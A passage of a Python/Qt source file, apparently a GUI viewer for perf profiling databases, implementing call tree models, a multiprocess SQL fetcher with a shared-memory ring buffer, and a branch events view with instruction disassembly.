                child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
                child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
            else:
                child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
    """Call tree item for a comm (level one)."""
    def __init__(self, glb, params, row, comm_id, comm, parent_item):
        super(CallTreeLevelOneItem, self).__init__(glb, params, row, parent_item)
        if self.params.have_ipc:
            self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
        else:
            self.data = [comm, "", "", "", "", "", ""]
        self.dbid = comm_id
    def Select(self):
        """Lazily populate one child item per thread of this comm."""
        self.query_done = True
        query = QSqlQuery(self.glb.db)
        QueryExec(query, "SELECT thread_id, pid, tid"
            " FROM comm_threads"
            " INNER JOIN threads ON thread_id = threads.id"
            " WHERE comm_id = " + str(self.dbid))
        while query.next():
            child_item = CallTreeLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
            self.child_items.append(child_item)
            self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
    """Root of the call tree: one child per comm that has calls."""
    def __init__(self, glb, params):
        super(CallTreeRootItem, self).__init__(glb, params, 0, None)
        self.dbid = 0
        # Children are populated right here, so no lazy Select() is needed later
        self.query_done = True
        if_has_calls = ""
        # Newer databases have a has_calls column that lets us skip comms without calls
        if IsSelectable(glb.db, "comms", columns = "has_calls"):
            if_has_calls = " WHERE has_calls = TRUE"
        query = QSqlQuery(glb.db)
        QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
        while query.next():
            # Skip rows with a null / zero comm id
            if not query.value(0):
                continue
            child_item = CallTreeLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
            self.child_items.append(child_item)
            self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
    """Call tree model: comm -> thread -> chronological calls hierarchy."""
    def __init__(self, glb, parent=None):
        super(CallTreeModel, self).__init__(glb, parent)
    def GetRoot(self):
        return CallTreeRootItem(self.glb, self.params)
    def columnCount(self, parent=None):
        # Extra columns when instruction / cycle counts (IPC) are available
        if self.params.have_ipc:
            return 12
        else:
            return 7
    def columnHeader(self, column):
        if self.params.have_ipc:
            headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
        else:
            headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
        return headers[column]
    def columnAlignment(self, column):
        if self.params.have_ipc:
            alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
        else:
            alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
        return alignment[column]
    def DoFindSelect(self, query, match):
        """Select the calls whose symbol name matches, in chronological order."""
        QueryExec(query, "SELECT calls.id, comm_id, thread_id"
            " FROM calls"
            " INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
            " INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
            " WHERE symbols.name" + match +
            " ORDER BY comm_id, thread_id, call_time, calls.id")
    def FindPath(self, query):
        # Turn the query result into a list of ids that the tree view can walk
        # to open the tree at the right place.
        ids = []
        parent_id = query.value(0)
        # Walk the call ancestry up via parent_id
        while parent_id:
            ids.insert(0, parent_id)
            q2 = QSqlQuery(self.glb.db)
            QueryExec(q2, "SELECT parent_id"
                " FROM calls"
                " WHERE id = " + str(parent_id))
            if not q2.next():
                break
            parent_id = q2.value(0)
        # Prepend thread id and comm id to match the tree levels
        ids.insert(0, query.value(2))
        ids.insert(0, query.value(1))
        return ids
# Vertical widget layout
class VBox():
    """Stack two (optionally three) widgets vertically in a container widget."""
    def __init__(self, w1, w2, w3=None):
        self.vbox = QWidget()
        layout = QVBoxLayout()
        # No margins, so the stacked widgets fill the container edge-to-edge
        layout.setContentsMargins(0, 0, 0, 0)
        self.vbox.setLayout(layout)
        layout.addWidget(w1)
        layout.addWidget(w2)
        if w3:
            layout.addWidget(w3)
    def Widget(self):
        """Return the container widget."""
        return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
    """Base class for MDI sub-windows showing a tree view with a find bar."""
    def __init__(self, parent=None):
        super(TreeWindowBase, self).__init__(parent)
        # Subclasses must set model and find_bar
        self.model = None
        self.find_bar = None
        self.view = QTreeView()
        self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
        self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
        self.context_menu = TreeContextMenu(self.view)
    def DisplayFound(self, ids):
        """Walk 'ids' down the tree, selecting the matching child at each level.

        Returns True if the full path was found and selected.
        """
        if not len(ids):
            return False
        parent = QModelIndex()
        for dbid in ids:
            found = False
            n = self.model.rowCount(parent)
            # Linear scan of this level's children for the matching dbid
            for row in xrange(n):
                child = self.model.index(row, 0, parent)
                if child.internalPointer().dbid == dbid:
                    found = True
                    self.view.setCurrentIndex(child)
                    parent = child
                    break
            if not found:
                break
        return found
    def Find(self, value, direction, pattern, context):
        """Start an asynchronous find via the model."""
        self.view.setFocus()
        self.find_bar.Busy()
        self.model.Find(value, direction, pattern, context, self.FindDone)
    def FindDone(self, ids):
        found = True
        if not self.DisplayFound(ids):
            found = False
        self.find_bar.Idle()
        if not found:
            self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
    """MDI sub-window displaying the context-sensitive call graph."""
    def __init__(self, glb, parent=None):
        super(CallGraphWindow, self).__init__(parent)
        # Share one model instance per model name across windows
        self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
        self.view.setModel(self.model)
        # Reasonable default column widths
        for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
            self.view.setColumnWidth(c, w)
        self.find_bar = FindBar(self, self)
        self.vbox = VBox(self.view, self.find_bar.Widget())
        self.setWidget(self.vbox.Widget())
        AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
    """MDI sub-window displaying the call tree."""
    def __init__(self, glb, parent=None):
        super(CallTreeWindow, self).__init__(parent)
        # Share one model instance per model name across windows
        self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
        self.view.setModel(self.model)
        # Reasonable default column widths
        for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
            self.view.setColumnWidth(c, w)
        self.find_bar = FindBar(self, self)
        self.vbox = VBox(self.view, self.find_bar.Widget())
        self.setWidget(self.vbox.Widget())
        AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
class ChildDataItemFinder():
    """Search the children of a single tree item by substring or regular expression.

    The matching row numbers are cached so that repeated finds with the same
    terms simply step forwards / backwards through the previous results.
    """
    def __init__(self, root):
        self.root = root
        self.value = None
        self.direction = None
        self.pattern = None
        self.last_value = None
        self.last_pattern = None
        self.rows = []
        self.pos = 0
    def FindSelect(self):
        # Rebuild the list of matching row numbers
        self.rows = []
        if self.pattern:
            regex = re.compile(self.value)
            matches = lambda text: re.search(regex, text) is not None
        else:
            matches = lambda text: self.value in text
        for child in self.root.child_items:
            # A child matches if any of its columns match
            if any(matches(str(column_data)) for column_data in child.data):
                self.rows.append(child.row)
    def FindValue(self):
        """Return the first matching row, refreshing the cache if terms changed."""
        self.pos = 0
        if self.last_value != self.value or self.pattern != self.last_pattern:
            self.FindSelect()
        if not len(self.rows):
            return -1
        return self.rows[self.pos]
    def FindThread(self):
        """Worker-thread body: returns (done, row) with row == -1 when not found."""
        if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
            return (True, self.FindValue())
        if not len(self.rows):
            return (True, -1)
        # Step through the cached matches, wrapping around at either end
        step = 1 if self.direction > 0 else -1
        self.pos = (self.pos + step) % len(self.rows)
        return (True, self.rows[self.pos])
    def Find(self, value, direction, pattern, context, callback):
        # Remember the previous search terms before installing the new ones
        self.last_value, self.last_pattern = self.value, self.pattern
        self.value, self.direction, self.pattern = value, direction, pattern
        # Use a thread so the UI is not blocked
        thread = Thread(self.FindThread)
        thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
        thread.start()
    def FindDone(self, thread, callback, row):
        callback(row)
# Number of database records to fetch in one go
# (also the unit of the "Number of records (x N) to fetch" spin box below)
glb_chunk_sz = 10000
# Background process for SQL data fetcher
class SQLFetcherProcess():
    """Child-process side of the SQL fetcher.

    Executes the SQL in chunks and writes pickled rows into a shared-memory
    ring buffer that the SQLFetcher in the main process drains.  Positions
    and counters are shared Values; events are used to wake each side.
    """
    def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
        # Need a unique connection name
        conn_name = "SQLFetcher" + str(os.getpid())
        self.db, dbname = dbref.Open(conn_name)
        self.sql = sql
        self.buffer = buffer                  # shared ring buffer of pickled rows
        self.head = head                      # shared write position (owned here)
        self.tail = tail                      # shared read position (advanced by reader)
        self.fetch_count = fetch_count        # total rows made available to the reader
        self.fetching_done = fetching_done    # set when there is no more data
        self.process_target = process_target  # rows wanted; < 0 means exit
        self.wait_event = wait_event          # reader -> writer wakeup
        self.fetched_event = fetched_event    # writer -> reader wakeup
        self.prep = prep                      # row preparation function
        self.query = QSqlQuery(self.db)
        # SQL containing $$last_id$$ pages itself and can be re-run forever;
        # otherwise allow the query to run only once (query_limit counts down)
        self.query_limit = 0 if "$$last_id$$" in sql else 2
        self.last_id = -1
        self.fetched = 0
        self.more = True
        self.local_head = self.head.value
        self.local_tail = self.tail.value
    def Select(self):
        """(Re-)execute the query, substituting the last seen id for paging."""
        if self.query_limit:
            if self.query_limit == 1:
                return
            self.query_limit -= 1
        stmt = self.sql.replace("$$last_id$$", str(self.last_id))
        QueryExec(self.query, stmt)
    def Next(self):
        """Return the next prepared row, or None when there is no more data."""
        if not self.query.next():
            # Current result set exhausted: fetch the next page
            self.Select()
            if not self.query.next():
                return None
        self.last_id = self.query.value(0)
        return self.prep(self.query)
    def WaitForTarget(self):
        """Block until the reader raises the target (or asks to exit with < 0)."""
        while True:
            self.wait_event.clear()
            target = self.process_target.value
            if target > self.fetched or target < 0:
                break
            self.wait_event.wait()
        return target
    def HasSpace(self, sz):
        """Check for sz bytes of contiguous space at the ring buffer head."""
        if self.local_tail <= self.local_head:
            space = len(self.buffer) - self.local_head
            if space > sz:
                return True
            if space >= glb_nsz:
                # Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
                nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
                self.buffer[self.local_head : self.local_head + len(nd)] = nd
            # Wrap to the start of the buffer
            self.local_head = 0
        if self.local_tail - self.local_head > sz:
            return True
        return False
    def WaitForSpace(self, sz):
        """Block until there is room for sz bytes, re-reading the shared tail."""
        if self.HasSpace(sz):
            return
        while True:
            self.wait_event.clear()
            self.local_tail = self.tail.value
            if self.HasSpace(sz):
                return
            self.wait_event.wait()
    def AddToBuffer(self, obj):
        """Append one pickled object, preceded by its pickled length."""
        d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
        n = len(d)
        nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
        sz = n + glb_nsz
        self.WaitForSpace(sz)
        pos = self.local_head
        self.buffer[pos : pos + len(nd)] = nd
        self.buffer[pos + glb_nsz : pos + sz] = d
        self.local_head += sz
    def FetchBatch(self, batch_size):
        """Fetch up to batch_size rows into the buffer, then notify the reader."""
        fetched = 0
        while batch_size > fetched:
            obj = self.Next()
            if obj is None:
                self.more = False
                break
            self.AddToBuffer(obj)
            fetched += 1
        if fetched:
            self.fetched += fetched
            with self.fetch_count.get_lock():
                self.fetch_count.value += fetched
            # Publish the new head only after the data is fully written
            self.head.value = self.local_head
            self.fetched_event.set()
    def Run(self):
        """Main loop: fetch batches until there is no more data or exit is requested."""
        while self.more:
            target = self.WaitForTarget()
            if target < 0:
                break
            batch_size = min(glb_chunk_sz, target - self.fetched)
            self.FetchBatch(batch_size)
        self.fetching_done.value = True
        self.fetched_event.set()
def SQLFetcherFn(*x):
    """Child-process entry point: construct the fetcher and run its main loop."""
    SQLFetcherProcess(*x).Run()
# SQL data fetcher
class SQLFetcher(QObject):
    """Main-process side of the SQL fetcher.

    Spawns a child process that fills a shared ring buffer with pickled rows,
    and a worker thread that waits for new rows and hands them to
    process_data() on the Qt main thread.  Emits done(count) per batch.
    """
    done = Signal(object)
    def __init__(self, glb, sql, prep, process_data, parent=None):
        super(SQLFetcher, self).__init__(parent)
        self.process_data = process_data
        self.more = True
        self.target = 0
        self.last_target = 0
        self.fetched = 0
        # 16 MiB shared ring buffer for pickled rows
        self.buffer_size = 16 * 1024 * 1024
        self.buffer = Array(c_char, self.buffer_size, lock=False)
        self.head = Value(c_longlong)       # write position (owned by the child)
        self.tail = Value(c_longlong)       # read position (owned here)
        self.local_tail = 0
        self.fetch_count = Value(c_longlong)
        self.fetching_done = Value(c_bool)
        self.last_count = 0
        self.process_target = Value(c_longlong)
        self.wait_event = Event()
        self.fetched_event = Event()
        glb.AddInstanceToShutdownOnExit(self)
        self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
        self.process.start()
        self.thread = Thread(self.Thread)
        self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
        self.thread.start()
    def Shutdown(self):
        # Tell the thread and process to exit
        self.process_target.value = -1
        self.wait_event.set()
        self.more = False
        self.fetching_done.value = True
        self.fetched_event.set()
    def Thread(self):
        """Worker thread: wait until the child reports newly fetched rows.

        Returns (done, count) for the Thread wrapper."""
        if not self.more:
            return True, 0
        while True:
            self.fetched_event.clear()
            fetch_count = self.fetch_count.value
            if fetch_count != self.last_count:
                break
            if self.fetching_done.value:
                self.more = False
                return True, 0
            self.fetched_event.wait()
        count = fetch_count - self.last_count
        self.last_count = fetch_count
        self.fetched += count
        return False, count
    def Fetch(self, nr):
        """Request nr more records; returns rows already available, or -1 if none left."""
        if not self.more:
            # -1 indicates there are no more
            return -1
        result = self.fetched
        extra = result + nr - self.target
        if extra > 0:
            self.target += extra
            # process_target < 0 indicates shutting down
            if self.process_target.value >= 0:
                self.process_target.value = self.target
            self.wait_event.set()
        return result
    def RemoveFromBuffer(self):
        """Unpickle and return the next object from the ring buffer."""
        # Start with the length header which precedes the pickled object
        pos = self.local_tail
        if len(self.buffer) - pos < glb_nsz:
            # Not even room for a length header: the writer wrapped
            pos = 0
        n = pickle.loads(self.buffer[pos : pos + glb_nsz])
        if n == 0:
            # Zero length marks "no more data at the top": wrap to the start
            pos = 0
            n = pickle.loads(self.buffer[0 : glb_nsz])
        pos += glb_nsz
        obj = pickle.loads(self.buffer[pos : pos + n])
        self.local_tail = pos + n
        return obj
    def ProcessData(self, count):
        """Main thread: drain 'count' rows from the buffer and hand them on."""
        for i in xrange(count):
            obj = self.RemoveFromBuffer()
            self.process_data(obj)
        self.tail.value = self.local_tail
        # Wake the child: buffer space has been freed
        self.wait_event.set()
        self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
    """Bar with a spin box and Go! button to fetch more records into 'model'.

    Shows a progress bar while fetching and an "All records fetched" label
    once the model reports no more data.
    """
    def __init__(self, model, parent):
        self.model = model
        self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
        self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
        self.fetch_count = QSpinBox()
        self.fetch_count.setRange(1, 1000000)
        self.fetch_count.setValue(10)
        self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
        self.fetch = QPushButton("Go!")
        self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
        self.fetch.released.connect(self.FetchMoreRecords)
        self.progress = QProgressBar()
        self.progress.setRange(0, 100)
        self.progress.hide()
        self.done_label = QLabel("All records fetched")
        self.done_label.hide()
        self.spacer = QLabel("")
        self.close_button = QToolButton()
        self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
        self.close_button.released.connect(self.Deactivate)
        self.hbox = QHBoxLayout()
        self.hbox.setContentsMargins(0, 0, 0, 0)
        self.hbox.addWidget(self.label)
        self.hbox.addWidget(self.fetch_count)
        self.hbox.addWidget(self.fetch)
        self.hbox.addWidget(self.spacer)
        self.hbox.addWidget(self.progress)
        self.hbox.addWidget(self.done_label)
        self.hbox.addWidget(self.close_button)
        self.bar = QWidget()
        self.bar.setLayout(self.hbox)
        self.bar.show()
        self.in_progress = False
        # Model emits progress(count) as records arrive; 0 means no more records
        self.model.progress.connect(self.Progress)
        self.done = False
        if not model.HasMoreRecords():
            self.Done()
    def Widget(self):
        return self.bar
    def Activate(self):
        self.bar.show()
        self.fetch.setFocus()
    def Deactivate(self):
        self.bar.hide()
    def Enable(self, enable):
        self.fetch.setEnabled(enable)
        self.fetch_count.setEnabled(enable)
    def Busy(self):
        """Switch to the in-progress appearance."""
        self.Enable(False)
        self.fetch.hide()
        self.spacer.hide()
        self.progress.show()
    def Idle(self):
        """Switch back to the idle appearance."""
        self.in_progress = False
        self.Enable(True)
        self.progress.hide()
        self.fetch.show()
        self.spacer.show()
    def Target(self):
        # Number of records requested per click
        return self.fetch_count.value() * glb_chunk_sz
    def Done(self):
        """No more records: hide the controls and show the done label."""
        self.done = True
        self.Idle()
        self.label.hide()
        self.fetch_count.hide()
        self.fetch.hide()
        self.spacer.hide()
        self.done_label.show()
    def Progress(self, count):
        if self.in_progress:
            if count:
                # NOTE(review): on python3 '/' produces a float here; setValue()
                # appears to tolerate it — confirm with the Qt bindings in use
                percent = ((count - self.start) * 100) / self.Target()
                if percent >= 100:
                    self.Idle()
                else:
                    self.progress.setValue(percent)
        if not count:
            # Count value of zero means no more records
            self.Done()
    def FetchMoreRecords(self):
        if self.done:
            return
        self.progress.setValue(0)
        self.Busy()
        self.in_progress = True
        # Remember the starting count so Progress() can compute a percentage
        self.start = self.model.FetchMoreRecords(self.Target())
# Brance data model level two item
class BranchLevelTwoItem():
    """Leaf item holding one line of text in a single column (no children)."""
    def __init__(self, row, col, text, parent_item):
        self.row = row
        self.parent_item = parent_item
        # Only column 'col' carries the text; the preceding columns are blank
        self.data = [""] * col + [text]
        self.level = 2
    def getParentItem(self):
        return self.parent_item
    def getRow(self):
        return self.row
    def childCount(self):
        # Leaf item: never any children
        return 0
    def hasChildren(self):
        return False
    def getData(self, column):
        return self.data[column]
# Brance data model level one item
class BranchLevelOneItem():
    """Branch model item for one sample row.

    Children, generated on demand by Select(), are disassembled instructions
    covering the code between this sample's target and the next sample on the
    same CPU (when a disassembler is available).
    """
    def __init__(self, glb, row, data, parent_item):
        self.glb = glb
        self.row = row
        self.parent_item = parent_item
        self.child_count = 0
        self.child_items = []
        # data[0] is the sample's database id; the rest are display columns
        self.data = data[1:]
        self.dbid = data[0]
        self.level = 1
        self.query_done = False
        # The disassembly goes into the last (branch) column
        self.br_col = len(self.data) - 1
    def getChildItem(self, row):
        return self.child_items[row]
    def getParentItem(self):
        return self.parent_item
    def getRow(self):
        return self.row
    def Select(self):
        """Disassemble from this sample's branch target up to the next sample."""
        self.query_done = True
        if not self.glb.have_disassembler:
            return
        # Look up this sample's target symbol / dso / offset
        query = QSqlQuery(self.glb.db)
        QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
            " FROM samples"
            " INNER JOIN dsos ON samples.to_dso_id = dsos.id"
            " INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
            " WHERE samples.id = " + str(self.dbid))
        if not query.next():
            return
        cpu = query.value(0)
        dso = query.value(1)
        sym = query.value(2)
        # Unknown dso or symbol: nothing to disassemble
        if dso == 0 or sym == 0:
            return
        off = query.value(3)
        short_name = query.value(4)
        long_name = query.value(5)
        build_id = query.value(6)
        sym_start = query.value(7)
        ip = query.value(8)
        # Find the next sample on the same CPU
        QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
            " FROM samples"
            " INNER JOIN symbols ON samples.symbol_id = symbols.id"
            " WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
            " ORDER BY samples.id"
            " LIMIT 1")
        if not query.next():
            return
        if query.value(0) != dso:
            # Cannot disassemble from one dso to another
            return
        bsym = query.value(1)
        boff = query.value(2)
        bsym_start = query.value(3)
        if bsym == 0:
            return
        # Number of bytes between the two samples; sanity-limited to 16K
        tot = bsym_start + boff + 1 - sym_start - off
        if tot <= 0 or tot > 16384:
            return
        inst = self.glb.disassembler.Instruction()
        f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
        if not f:
            return
        mode = 0 if Is64Bit(f) else 1
        self.glb.disassembler.SetMode(inst, mode)
        # Read the code bytes from the dso file (a little extra for safety)
        buf_sz = tot + 16
        buf = create_string_buffer(tot + 16)
        f.seek(sym_start + off)
        buf.value = f.read(buf_sz)
        buf_ptr = addressof(buf)
        i = 0
        while tot > 0:
            cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
            if cnt:
                byte_str = tohex(ip).rjust(16)
                for k in xrange(cnt):
                    byte_str += " %02x" % ord(buf[i])
                    i += 1
                # Pad the byte column (k carries over from the loop above)
                while k < 15:
                    byte_str += " "
                    k += 1
                self.child_items.append(BranchLevelTwoItem(0, self.br_col, byte_str + " " + text, self))
                self.child_count += 1
            else:
                # Disassembly failed: stop here
                return
            buf_ptr += cnt
            tot -= cnt
            buf_sz -= cnt
            ip += cnt
    def childCount(self):
        if not self.query_done:
            self.Select()
            if not self.child_count:
                # Distinguish "queried, no children" from "not yet queried"
                return -1
        return self.child_count
    def hasChildren(self):
        if not self.query_done:
            # Assume there may be children until Select() has actually run
            return True
        return self.child_count > 0
    def getData(self, column):
        return self.data[column]
# Brance data model root item
class BranchRootItem():
    """Invisible root of the branch model tree."""
    def __init__(self):
        self.child_items = []
        self.child_count = 0
        self.level = 0
    def getChildItem(self, row):
        return self.child_items[row]
    def getParentItem(self):
        # The root has no parent
        return None
    def getRow(self):
        return 0
    def childCount(self):
        return self.child_count
    def hasChildren(self):
        return self.child_count > 0
    def getData(self, column):
        # The root row displays nothing
        return ""
# Calculate instructions per cycle
def CalcIPC(cyc_cnt, insn_cnt):
    """Return instructions-per-cycle as a string rounded to 2 decimal places.

    Returns "0" if either count is zero (or missing)."""
    if not (cyc_cnt and insn_cnt):
        return "0"
    ipc = Decimal(float(insn_cnt) / cyc_cnt)
    return str(ipc.quantize(Decimal(".01"), rounding=ROUND_HALF_UP))
# Branch data preparation
def BranchDataPrepBr(query, data):
    """Append the formatted "from -> to" branch description column to data."""
    branch_from = (tohex(query.value(8)).rjust(16) + " " + query.value(9) +
        offstr(query.value(10)) + " (" + dsoname(query.value(11)) + ")")
    branch_to = (tohex(query.value(12)) + " " + query.value(13) +
        offstr(query.value(14)) + " (" + dsoname(query.value(15)) + ")")
    data.append(branch_from + " -> " + branch_to)
def BranchDataPrepIPC(query, data):
    """Append the instruction count, cycle count and IPC columns to data."""
    insn_cnt = query.value(16)
    cyc_cnt = query.value(17)
    data.extend([insn_cnt, cyc_cnt, CalcIPC(cyc_cnt, insn_cnt)])
def BranchDataPrep(query):
    """Turn one branch-sample query row into the model's data list."""
    data = [query.value(i) for i in xrange(0, 8)]
    BranchDataPrepBr(query, data)
    return data
def BranchDataPrepWA(query):
    """Like BranchDataPrep() but with the time column converted to a string."""
    data = [query.value(0)]
    # Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
    data.append("{:>19}".format(query.value(1)))
    data.extend(query.value(i) for i in xrange(2, 8))
    BranchDataPrepBr(query, data)
    return data
def BranchDataWithIPCPrep(query):
    """Turn one branch-sample query row (with IPC columns) into the data list."""
    data = [query.value(i) for i in xrange(0, 8)]
    BranchDataPrepIPC(query, data)
    BranchDataPrepBr(query, data)
    return data
def BranchDataWithIPCPrepWA(query):
    """Like BranchDataWithIPCPrep() but with the time column as a string."""
    data = [query.value(0)]
    # Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
    data.append("{:>19}".format(query.value(1)))
    data.extend(query.value(i) for i in xrange(2, 8))
    BranchDataPrepIPC(query, data)
    BranchDataPrepBr(query, data)
    return data
# Branch data model
class BranchModel(TreeModel):
    """Branch events model: rows are fetched lazily by a background SQLFetcher.

    Emits progress(count) as rows arrive; count == 0 means no more records.
    """
    progress = Signal(object)
    def __init__(self, glb, event_id, where_clause, parent=None):
        super(BranchModel, self).__init__(glb, None, parent)
        self.event_id = event_id
        self.more = True
        self.populated = 0
        # IPC columns exist only if the database has instruction / cycle counts
        self.have_ipc = IsSelectable(glb.db, "samples", columns = "insn_count, cyc_count")
        if self.have_ipc:
            select_ipc = ", insn_count, cyc_count"
            prep_fn = BranchDataWithIPCPrep
            prep_wa_fn = BranchDataWithIPCPrepWA
        else:
            select_ipc = ""
            prep_fn = BranchDataPrep
            prep_wa_fn = BranchDataPrepWA
        sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
            " CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
            " ip, symbols.name, sym_offset, dsos.short_name,"
            " to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
            + select_ipc +
            " FROM samples"
            " INNER JOIN comms ON comm_id = comms.id"
            " INNER JOIN threads ON thread_id = threads.id"
            " INNER JOIN branch_types ON branch_type = branch_types.id"
            " INNER JOIN symbols ON symbol_id = symbols.id"
            " INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
            " INNER JOIN dsos ON samples.dso_id = dsos.id"
            " INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
            " WHERE samples.id > $$last_id$$" + where_clause +
            " AND evsel_id = " + str(self.event_id) +
            " ORDER BY samples.id"
            " LIMIT " + str(glb_chunk_sz))
        # Pyside version 1 on python3 cannot handle large integers (i.e. time),
        # so it needs the workaround prep function that converts the time to a
        # string.  (Previously this condition selected the workaround for
        # exactly the cases that do not need it.)
        if pyside_version_1 and sys.version_info[0] == 3:
            prep = prep_wa_fn
        else:
            prep = prep_fn
        self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
        self.fetcher.done.connect(self.Update)
        self.fetcher.Fetch(glb_chunk_sz)
    def GetRoot(self):
        return BranchRootItem()
    def columnCount(self, parent=None):
        # Extra columns when instruction / cycle counts (IPC) are available
        if self.have_ipc:
            return 11
        else:
            return 8
    def columnHeader(self, column):
        if self.have_ipc:
            return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Insn Cnt", "Cyc Cnt", "IPC", "Branch")[column]
        else:
            return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
    def columnFont(self, column):
        # Monospace for the branch / disassembly column so addresses line up
        if self.have_ipc:
            br_col = 10
        else:
            br_col = 7
        if column != br_col:
            return None
        return QFont("Monospace")
    def DisplayData(self, item, index):
        if item.level == 1:
            self.FetchIfNeeded(item.row)
        return item.getData(index.column())
    def AddSample(self, data):
        """Fetcher callback: append one row (rows are announced later by Update())."""
        child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
        self.root.child_items.append(child)
        self.populated += 1
    def Update(self, fetched):
        """Fetcher batch complete: insert the new rows into the view."""
        if not fetched:
            self.more = False
            self.progress.emit(0)
        child_count = self.root.child_count
        count = self.populated - child_count
        if count > 0:
            parent = QModelIndex()
            self.beginInsertRows(parent, child_count, child_count + count - 1)
            self.insertRows(child_count, count, parent)
            self.root.child_count += count
            self.endInsertRows()
            self.progress.emit(self.root.child_count)
    def FetchMoreRecords(self, count):
        """Request more rows; returns the current row count for progress tracking."""
        current = self.root.child_count
        if self.more:
            self.fetcher.Fetch(count)
        else:
            self.progress.emit(0)
        return current
    def HasMoreRecords(self):
        return self.more
# Report Variables
class ReportVars():
    """User-supplied report parameters: display name, WHERE clause and LIMIT."""
    def __init__(self, name = "", where_clause = "", limit = ""):
        self.name = name
        self.where_clause = where_clause
        self.limit = limit
    def UniqueId(self):
        # Reports sharing the same filter and limit can share the same model
        return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
    """MDI sub-window displaying branch events for one event type."""
    def __init__(self, glb, event_id, report_vars, parent=None):
        super(BranchWindow, self).__init__(parent)
        # Share one model per (event, where clause, limit) combination
        model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
        self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
        self.view = QTreeView()
        self.view.setUniformRowHeights(True)
        self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
        self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
        self.view.setModel(self.model)
        self.ResizeColumnsToContents()
        self.context_menu = TreeContextMenu(self.view)
        self.find_bar = FindBar(self, self, True)
        self.finder = ChildDataItemFinder(self.model.root)
        self.fetch_bar = FetchMoreRecordsBar(self.model, self)
        self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
        self.setWidget(self.vbox.Widget())
        AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
